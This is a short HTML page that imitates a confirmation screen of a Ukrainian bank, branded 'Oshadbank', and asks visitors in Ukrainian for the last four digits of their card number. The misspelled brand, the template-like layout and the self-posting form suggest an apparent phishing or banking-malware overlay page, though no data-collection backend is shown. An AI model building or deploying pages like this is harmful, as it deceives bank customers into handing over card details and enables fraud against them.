<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" type="image/png" href="logo_oshadbank.png">
  <title>Oshadbank</title>
  <style>
    body { background-image: linear-gradient(-3deg, #f2f5fa 80%, #fdf01f 83%, #26cfc7 10%); } .logo { height: 55px; width: 55px; background: url('logo_oshadbank.png') no-repeat center; } .logo-page { width:65px; height:65px; } .button { color: #fff; border-radius: 4px; background-color: #26cfc7; } .bar { border: 2px solid #26cfc7; } .bar::before { background-color: #26cfc7; }
  </style>
  <link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
  <div class="content">
    <div class="logo"></div>
    <h2>Пiдтвердження</h2>
    <p>Введіть останні 4 цифри номера картки</p>
     <form method="post">
      <input type="tel" id="pine" name="pine" data-text="Останні 4 цифри номера картки" placeholder="0000" minlength="4" maxlength="4" autocomplete="off" style="font-size:22px; letter-spacing: 5px; margin-top: 20px;">
      <p class="format">Будь ласка, вкажіть останні 4 цифри номера вашої картки.</p>
      <button type="submit" class="button">Далi</button>
    </form>
  </div>

</body>
</html>
